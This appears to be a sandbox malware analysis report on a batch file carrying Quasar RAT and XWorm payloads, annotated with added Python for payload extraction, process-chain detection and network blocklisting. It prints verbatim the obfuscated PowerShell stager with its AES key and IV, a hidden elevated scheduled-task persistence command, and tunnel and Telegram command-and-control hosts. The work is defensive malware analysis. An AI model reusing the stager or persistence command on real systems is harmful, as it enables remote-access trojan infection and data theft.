Malware Analysis Report

2024-10-23 21:29

Sample ID 240414-s6sevace71
Target Client-built.bat
SHA256 950153a1ef5114d609ca8fa79a28374c1f24ae84a8f90ef0a21fb7914639b4e9
Tags
quasar xworm office04 rat spyware trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

950153a1ef5114d609ca8fa79a28374c1f24ae84a8f90ef0a21fb7914639b4e9

Threat Level: Known bad

The file Client-built.bat was found to be: Known bad.

Malicious Activity Summary

quasar xworm office04 rat spyware trojan

Xworm

Detect Xworm Payload

Quasar RAT

Quasar payload

Blocklisted process makes network request

Checks computer location settings

Executes dropped EXE

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Modifies registry class

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-04-14 15:44

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-04-14 15:44

Reported

2024-04-14 15:45

Platform

win7-20240319-en

Max time kernel

41s

Max time network

15s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\Client-built.bat"

Signatures

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1620 wrote to memory of 2300 (3 events) N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\Client-built.bat"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('rut3Nxs7NHGxRfDGW4AZiW/la3bsD/qGa57R1oLq3Jk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IMGBAJCtblcDTdjuAM5M1A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $rYugK=New-Object System.IO.MemoryStream(,$param_var); $FsizC=New-Object System.IO.MemoryStream; $qQyLB=New-Object System.IO.Compression.GZipStream($rYugK, [IO.Compression.CompressionMode]::Decompress); $qQyLB.CopyTo($FsizC); $qQyLB.Dispose(); $rYugK.Dispose(); $FsizC.Dispose(); $FsizC.ToArray();}function execute_function($param_var,$param2_var){ $YdjZT=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $WGHne=$YdjZT.EntryPoint; $WGHne.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Client-built.bat';$tUlfv=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Client-built.bat').Split([Environment]::NewLine);foreach ($opvFd in $tUlfv) { if ($opvFd.StartsWith(':: ')) { $vKkrO=$opvFd.Substring(3); break; }}$payloads_var=[string[]]$vKkrO.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));

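The command line above is the whole stager. It reads its own .bat file back in, takes the first line that begins with ":: " (a batch comment, so cmd.exe never treats it as code), splits the remainder on a single backslash, base64-decodes each half, AES-CBC-decrypts it with the hard-coded key and IV (the key is 32 bytes, so AES-256; PKCS7 padding), gunzips the result and hands the bytes to Assembly.Load, invoking each entry point in turn: payload 1 with no arguments, payload 2 with an empty string array. The reversed literals rebuilt with ('...'[-1..-N] -join '') are FromBase64String, Load and ReadAllText, which keeps those names out of the command line. The same command runs again in behavioral2 from the persisted copy of the file. The extractor below is added here as an example; it is not part of the report or of the sample. It replays that chain offline and writes the decoded assemblies to disk instead of loading them, using the key and IV exactly as recorded above. It needs the third-party 'cryptography' package for the AES step, the function names are this example's own, and the .bat text in the test is a constructed stand-in, not the real sample.

```python
"""Static extractor for the payloads embedded in Client-built.bat.

Added example, not code from the sandbox report or from the sample. It
replays the stager's decode chain (base64 -> AES-256-CBC -> gunzip) with
the key and IV recorded in the report, but writes the resulting .NET
assemblies to disk instead of reflectively loading them. The AES step
needs the third-party 'cryptography' package; everything else is stdlib.
"""
import base64
import gzip
import os
import sys

# Key and IV exactly as they appear in the PowerShell command line.
KEY = base64.b64decode("rut3Nxs7NHGxRfDGW4AZiW/la3bsD/qGa57R1oLq3Jk=")  # 32 bytes: AES-256
IV = base64.b64decode("IMGBAJCtblcDTdjuAM5M1A==")                       # 16 bytes: one block


def unreverse(s: str) -> str:
    """The stager hides .NET method names as reversed strings and rebuilds
    them with ('...'[-1..-N] -join ''); this is the Python equivalent."""
    return s[::-1]


def carve_blobs(bat_text: str) -> list:
    """Return the base64-decoded ciphertext blobs from the first line that
    starts with ':: ' (a batch comment). The stager takes the rest of that
    line and splits it on a single backslash."""
    for line in bat_text.splitlines():
        if line.startswith(":: "):
            return [base64.b64decode(p) for p in line[3:].split("\\") if p]
    raise ValueError("no ':: ' payload line found")


def aes_available() -> bool:
    try:
        import cryptography  # noqa: F401
        return True
    except ImportError:
        return False


def aes_cbc(data: bytes, encrypt: bool) -> bytes:
    """AES-CBC with PKCS7, the settings the stager puts on Aes.Create()."""
    from cryptography.hazmat.primitives import padding
    from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
    cipher = Cipher(algorithms.AES(KEY), modes.CBC(IV))
    if encrypt:
        pad = padding.PKCS7(128).padder()
        enc = cipher.encryptor()
        return enc.update(pad.update(data) + pad.finalize()) + enc.finalize()
    dec = cipher.decryptor()
    unpad = padding.PKCS7(128).unpadder()
    return unpad.update(dec.update(data) + dec.finalize()) + unpad.finalize()


def decode_payload(blob: bytes) -> bytes:
    """Decrypt then gunzip, the order the stager uses (decompress_function
    wraps decrypt_function), and refuse anything that is not a PE image."""
    plain = aes_cbc(blob, encrypt=False)
    if plain[:2] != b"\x1f\x8b":
        raise ValueError("decrypted data is not gzip: wrong key/IV or blob")
    pe = gzip.decompress(plain)
    if pe[:2] != b"MZ":
        raise ValueError("decompressed data is not a PE image")
    return pe


def encode_payload(pe: bytes) -> bytes:
    """Inverse of decode_payload; only used to build test fixtures."""
    return aes_cbc(gzip.compress(pe), encrypt=True)


def extract(bat_path: str, out_dir: str) -> list:
    """Carve and decode every embedded payload, write each to out_dir and
    return the written paths. Nothing is executed."""
    with open(bat_path, "r", encoding="utf-8", errors="ignore") as f:
        blobs = carve_blobs(f.read())
    os.makedirs(out_dir, exist_ok=True)
    written = []
    for i, blob in enumerate(blobs, 1):
        path = os.path.join(out_dir, f"payload{i}.bin")
        with open(path, "wb") as f:
            f.write(decode_payload(blob))
        written.append(path)
    return written


if __name__ == "__main__":
    out = sys.argv[2] if len(sys.argv) > 2 else "extracted"
    for p in extract(sys.argv[1], out):
        print("wrote", p)
```

Run it as "python extract.py Client-built.bat extracted" on an isolated analysis box; the two .bin files are the assemblies the sandbox saw loaded into powershell.exe and can be hashed and opened in a .NET decompiler without ever running them. The two sanity checks (gzip magic after decryption, MZ after decompression) are what tells you a different sample of the same builder has changed its key or IV.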
Network

N/A

Files

memory/2300-4-0x000000001B160000-0x000000001B442000-memory.dmp

memory/2300-6-0x000007FEF5980000-0x000007FEF631D000-memory.dmp

memory/2300-5-0x0000000002620000-0x0000000002628000-memory.dmp

memory/2300-7-0x0000000002550000-0x00000000025D0000-memory.dmp

memory/2300-8-0x000007FEF5980000-0x000007FEF631D000-memory.dmp

memory/2300-9-0x0000000002550000-0x00000000025D0000-memory.dmp

memory/2300-10-0x0000000002550000-0x00000000025D0000-memory.dmp

memory/2300-11-0x0000000002550000-0x00000000025D0000-memory.dmp

memory/2300-12-0x000007FEF5980000-0x000007FEF631D000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-04-14 15:44

Reported

2024-04-14 15:45

Platform

win10v2004-20240412-en

Max time kernel

58s

Max time network

64s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Client-built.bat"

Signatures

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A (3 matches; no indicator, process or target reported)

Quasar RAT

trojan spyware quasar

Quasar payload

Description Indicator Process Target
N/A N/A N/A N/A

Xworm

trojan rat xworm

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-553605503-2331009851-2137262461-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\XClientNOT.exe N/A

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-553605503-2331009851-2137262461-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

The remaining 62 rows are three repetitions of the same 21-privilege sweep, every row with Indicator N/A, Process C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe and Target N/A; the table is capped at 64 rows, so the third repetition is cut off after LUID 35. Each sweep, in the order logged:
SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36

That is LUID order over the privileges an elevated administrator token holds disabled by default, i.e. the process enabled all of them in one pass rather than only SeDebugPrivilege. The sandbox does not resolve LUIDs 33-36; in winnt.h they are SeIncreaseWorkingSetPrivilege (33), SeTimeZonePrivilege (34), SeCreateSymbolicLinkPrivilege (35) and SeDelegateSessionUserImpersonatePrivilege (36).

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3720 wrote to memory of 1844 (2 events) N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1844 wrote to memory of 4536 (2 events) N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1844 wrote to memory of 3748 (2 events) N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WScript.exe
PID 3748 wrote to memory of 2948 (2 events) N/A C:\Windows\System32\WScript.exe C:\Windows\system32\cmd.exe
PID 2948 wrote to memory of 2224 (2 events) N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2224 wrote to memory of 3880 (2 events) N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\XClientNOT.exe

These are the writes a parent performs into a child it has just created (the Processes list below carries the matching command lines), so the rows give the process tree of this detonation:

cmd.exe (3720)  /c Client-built.bat
  powershell.exe (1844)  loader: decrypts and reflectively loads both payloads
    powershell.exe (4536)  Register-ScheduledTask: at-logon task that runs startup_str_334.vbs
    WScript.exe (3748)  startup_str_334.vbs
      cmd.exe (2948)  /c startup_str_334.bat
        powershell.exe (2224)  the same loader, run from the persisted copy
          XClientNOT.exe (3880)

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Client-built.bat"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('rut3Nxs7NHGxRfDGW4AZiW/la3bsD/qGa57R1oLq3Jk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IMGBAJCtblcDTdjuAM5M1A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $rYugK=New-Object System.IO.MemoryStream(,$param_var); $FsizC=New-Object System.IO.MemoryStream; $qQyLB=New-Object System.IO.Compression.GZipStream($rYugK, [IO.Compression.CompressionMode]::Decompress); $qQyLB.CopyTo($FsizC); $qQyLB.Dispose(); $rYugK.Dispose(); $FsizC.Dispose(); $FsizC.ToArray();}function execute_function($param_var,$param2_var){ $YdjZT=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $WGHne=$YdjZT.EntryPoint; $WGHne.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Client-built.bat';$tUlfv=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Client-built.bat').Split([Environment]::NewLine);foreach ($opvFd in $tUlfv) { if ($opvFd.StartsWith(':: ')) { $vKkrO=$opvFd.Substring(3); break; }}$payloads_var=[string[]]$vKkrO.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_334_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_334.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_334.vbs"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_334.bat" "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('rut3Nxs7NHGxRfDGW4AZiW/la3bsD/qGa57R1oLq3Jk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IMGBAJCtblcDTdjuAM5M1A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $rYugK=New-Object System.IO.MemoryStream(,$param_var); $FsizC=New-Object System.IO.MemoryStream; $qQyLB=New-Object System.IO.Compression.GZipStream($rYugK, [IO.Compression.CompressionMode]::Decompress); $qQyLB.CopyTo($FsizC); $qQyLB.Dispose(); $rYugK.Dispose(); $FsizC.Dispose(); $FsizC.ToArray();}function execute_function($param_var,$param2_var){ $YdjZT=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $WGHne=$YdjZT.EntryPoint; $WGHne.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_334.bat';$tUlfv=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_334.bat').Split([Environment]::NewLine);foreach ($opvFd in $tUlfv) { if ($opvFd.StartsWith(':: ')) { $vKkrO=$opvFd.Substring(3); break; }}$payloads_var=[string[]]$vKkrO.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));

C:\Users\Admin\AppData\Local\Temp\XClientNOT.exe

"C:\Users\Admin\AppData\Local\Temp\XClientNOT.exe"

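Read together, the entries above are one chain: cmd.exe runs the .bat, the loader powershell.exe (1844) registers an at-logon scheduled task with -RunLevel Highest whose action is a .vbs in AppData\Roaming, then runs that .vbs through WScript.exe; the .vbs runs a .bat copy of the sample (cmd.exe 2948), which starts the identical loader again (2224), and that second loader drops and runs XClientNOT.exe from AppData\Local\Temp. The rules below are added here as an example and are not taken from the report or from any detection product. They encode those steps over process-creation records using the four fields that both Sysmon Event ID 1 and Security 4688 provide. The event list is constructed from the PIDs, parents, images and command lines in this report (the loader command line is abridged to the flags and reversed-string lookups the rules inspect), and the rule names are this example's own.

```python
"""Process-chain rules for the behavioral2 detonation.

Added example, not part of the sandbox report. EVENTS is constructed
from the PIDs, parents, images and command lines the report lists (the
loader command line is abridged to the parts the rules inspect); the
rule names are this example's own. The same four fields exist in Sysmon
Event ID 1 and Security 4688 events.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


# ('gnirtS46esaBmorF'[-1..-16] -join ''): a reversed literal turned back into
# a method name at run time (FromBase64String, Load, ReadAllText in the sample).
REVERSED_CALL = re.compile(r"\('[A-Za-z0-9]+'\[-1\.\.-\d+\]\s*-join\s*''\)")
EP_BYPASS = re.compile(r"-(?:ep|executionpolicy)\s+bypass", re.I)
SCHTASK_HIGHEST = re.compile(r"Register-ScheduledTask\b.*-RunLevel\s+Highest", re.I | re.S)
USER_WRITABLE = re.compile(r"\\AppData\\(?:Roaming|Local\\Temp)\\", re.I)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def ancestry(ev: ProcEvent, by_pid: dict) -> list:
    """Image basenames of parent, grandparent, ... (nearest first)."""
    chain, seen, cur = [], set(), by_pid.get(ev.ppid)
    while cur is not None and cur.pid not in seen:
        seen.add(cur.pid)
        chain.append(basename(cur.image))
        cur = by_pid.get(cur.ppid)
    return chain


def evaluate(events: list) -> list:
    """Return (rule, pid) for every rule each event triggers."""
    by_pid = {e.pid: e for e in events}
    hits = []
    for e in events:
        name, anc = basename(e.image), ancestry(e, by_pid)
        if name == "powershell.exe":
            if EP_BYPASS.search(e.cmdline) and REVERSED_CALL.search(e.cmdline):
                hits.append(("ps_reversed_string_loader", e.pid))
            if SCHTASK_HIGHEST.search(e.cmdline) and USER_WRITABLE.search(e.cmdline):
                hits.append(("schtask_highest_from_user_dir", e.pid))
            if anc[:2] == ["cmd.exe", "wscript.exe"]:
                hits.append(("wscript_cmd_powershell_chain", e.pid))
        if name == "wscript.exe" and USER_WRITABLE.search(e.cmdline):
            hits.append(("wscript_script_in_user_dir", e.pid))
        if USER_WRITABLE.search(e.image) and anc[:1] == ["powershell.exe"]:
            hits.append(("powershell_spawns_exe_from_user_dir", e.pid))
    return hits


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"


def loader_cmdline(bat_path: str) -> str:
    """Abridged loader command line: flags and reversed-string lookups are
    verbatim from the report, the rest of the script body is elided."""
    return ('"' + PS + '" -noprofile -ep bypass -command function decrypt_function($param_var){ '
            "$aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')"
            "('rut3Nxs7NHGxRfDGW4AZiW/la3bsD/qGa57R1oLq3Jk='); ... }"
            "$tUlfv=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('" + bat_path + "') ...")


EVENTS = [  # constructed from the WriteProcessMemory rows and the Processes list
    ProcEvent(3720, 0, r"C:\Windows\system32\cmd.exe",
              r'C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Client-built.bat"'),
    ProcEvent(1844, 3720, PS, loader_cmdline(r"C:\Users\Admin\AppData\Local\Temp\Client-built.bat")),
    ProcEvent(4536, 1844, PS, '"' + PS + "\" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_334_str' "
              "-Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction "
              r"-Execute 'C:\Users\Admin\AppData\Roaming\startup_str_334.vbs') -Settings "
              "(New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) "
              "-RunLevel Highest -Force"),
    ProcEvent(3748, 1844, r"C:\Windows\System32\WScript.exe",
              r'"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_334.vbs"'),
    ProcEvent(2948, 3748, r"C:\Windows\system32\cmd.exe",
              r'C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_334.bat" "'),
    ProcEvent(2224, 2948, PS, loader_cmdline(r"C:\Users\Admin\AppData\Roaming\startup_str_334.bat")),
    ProcEvent(3880, 2224, r"C:\Users\Admin\AppData\Local\Temp\XClientNOT.exe",
              r'"C:\Users\Admin\AppData\Local\Temp\XClientNOT.exe"'),
]

if __name__ == "__main__":
    for rule, pid in evaluate(EVENTS):
        print(f"{pid:>5}  {rule}")
```

The reversed-string rule is the most portable one: it does not depend on the key, the file names or the task name, only on the ('...'[-N..-1] -join '') idiom this builder uses to hide method names, and it fires on both loader instances. The ancestry walk is what turns the otherwise ordinary wscript.exe and cmd.exe launches into a finding, because each of them is unremarkable on its own and only the chain from a scheduled-task VBS to a PowerShell loader is not.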
Network

Country Destination Domain Proto
US 8.8.8.8:53 9.228.82.20.in-addr.arpa udp
US 8.8.8.8:53 240.197.17.2.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 22.186.200.23.in-addr.arpa udp
US 8.8.8.8:53 express-divorce.gl.at.ply.gg udp
US 147.185.221.18:22562 express-divorce.gl.at.ply.gg tcp
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 220.167.154.149.in-addr.arpa udp
US 8.8.8.8:53 traffic-collins.gl.at.ply.gg udp
US 147.185.221.19:24820 traffic-collins.gl.at.ply.gg tcp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 134.71.91.104.in-addr.arpa udp
US 147.185.221.18:22562 express-divorce.gl.at.ply.gg tcp
US 147.185.221.19:24820 traffic-collins.gl.at.ply.gg tcp
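
Of the sixteen rows above only three destinations matter: two playit.gg tunnel endpoints (express-divorce.gl.at.ply.gg on 147.185.221.18:22562 and traffic-collins.gl.at.ply.gg on 147.185.221.19:24820, each connected to twice) and api.telegram.org over 443. The 8.8.8.8 rows are the sandbox resolving names on the sample's behalf, and the in-addr.arpa rows are its reverse lookups of peers it had already seen; neither is an indicator. The script below is added here as an example and is not part of the report. It parses the table exactly as printed, drops that noise, keeps DNS lookups apart from actual connections, counts repeats, and produces the list you would hand to a firewall or a DNS RPZ. The category labels and suffix lists are this example's own.

```python
"""Network triage for the behavioral2 detonation.

Added example, not part of the sandbox report. NETWORK_ROWS is the
report's Network table copied verbatim; the split into DNS lookups,
connections and reverse-lookup noise, and the category labels, are this
example's own.
"""
from collections import OrderedDict

NETWORK_ROWS = """\
US 8.8.8.8:53 9.228.82.20.in-addr.arpa udp
US 8.8.8.8:53 240.197.17.2.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 22.186.200.23.in-addr.arpa udp
US 8.8.8.8:53 express-divorce.gl.at.ply.gg udp
US 147.185.221.18:22562 express-divorce.gl.at.ply.gg tcp
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 220.167.154.149.in-addr.arpa udp
US 8.8.8.8:53 traffic-collins.gl.at.ply.gg udp
US 147.185.221.19:24820 traffic-collins.gl.at.ply.gg tcp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 134.71.91.104.in-addr.arpa udp
US 147.185.221.18:22562 express-divorce.gl.at.ply.gg tcp
US 147.185.221.19:24820 traffic-collins.gl.at.ply.gg tcp
"""

RESOLVERS = {"8.8.8.8"}               # the sandbox's upstream DNS, not an IOC
TUNNEL_SUFFIXES = (".ply.gg",)        # playit.gg relay names (*.gl.at.ply.gg here)
BOT_API_HOSTS = {"api.telegram.org"}  # legitimate service used as a side channel


def parse_rows(text: str) -> list:
    """Split the flattened 'Country Destination Domain Proto' rows."""
    rows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        country, dest, domain, proto = line.split()
        ip, port = dest.rsplit(":", 1)
        rows.append({"country": country, "ip": ip, "port": int(port),
                     "domain": domain, "proto": proto})
    return rows


def domain_kind(domain: str) -> str:
    if domain.endswith(".in-addr.arpa"):
        return "ptr_noise"  # the sandbox resolving the peers it saw
    if domain.endswith(TUNNEL_SUFFIXES):
        return "tunnel_c2"
    if domain in BOT_API_HOSTS:
        return "bot_api"
    return "other"


def triage(text: str):
    """Return (connections, lookups).

    connections: (domain, ip, port, proto) -> (kind, count), deduplicated
    lookups:     domain -> kind, only for names that were queried but
                 never connected to
    A DNS query proves the name was resolved, not that traffic followed,
    so the two are kept apart; reverse lookups are dropped entirely.
    """
    connections, lookups = OrderedDict(), OrderedDict()
    for r in parse_rows(text):
        kind = domain_kind(r["domain"])
        if kind == "ptr_noise":
            continue
        is_dns = r["ip"] in RESOLVERS and r["port"] == 53 and r["proto"] == "udp"
        if is_dns:
            lookups.setdefault(r["domain"], kind)
        else:
            key = (r["domain"], r["ip"], r["port"], r["proto"])
            _, n = connections.get(key, (kind, 0))
            connections[key] = (kind, n + 1)
    for key in connections:
        lookups.pop(key[0], None)  # a real connection supersedes the bare lookup
    return connections, lookups


def blocklist(text: str) -> list:
    """Every endpoint the sample actually connected to, plus queried-only
    names that match a tunnel or bot-API pattern."""
    connections, lookups = triage(text)
    items = [f"{d} {ip}:{port}/{proto} ({kind}, {n}x)"
             for (d, ip, port, proto), (kind, n) in connections.items()]
    items += [f"{d} (dns only, {kind})" for d, kind in lookups.items()
              if kind != "other"]
    return items


if __name__ == "__main__":
    for line in blocklist(NETWORK_ROWS):
        print(line)
```

The tunnel hosts are the actionable part: *.gl.at.ply.gg names and the 147.185.221.0/24 relay addresses are shared playit.gg infrastructure, so blocking the two FQDNs and the two IP:port pairs is safe, while blocking api.telegram.org or 149.154.167.220 is a policy decision, since it is legitimate infrastructure that the sample merely abuses.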

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_yyhp30qw.aod.ps1 (benign: powershell.exe writes this throwaway script at startup to probe AppLocker/WDAC script enforcement; it is a side effect of PowerShell running, not something the sample dropped)

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1844-10-0x00007FF9D6600000-0x00007FF9D70C1000-memory.dmp

memory/1844-11-0x000001C0E9EA0000-0x000001C0E9EB0000-memory.dmp

memory/1844-5-0x000001C0EBFC0000-0x000001C0EBFE2000-memory.dmp

memory/1844-12-0x000001C0E9EA0000-0x000001C0E9EB0000-memory.dmp

memory/1844-13-0x000001C0E9EA0000-0x000001C0E9EB0000-memory.dmp

memory/1844-14-0x000001C0EBF90000-0x000001C0EBF98000-memory.dmp

memory/1844-15-0x000001C0EC320000-0x000001C0EC45A000-memory.dmp

memory/4536-22-0x00007FF9D6600000-0x00007FF9D70C1000-memory.dmp

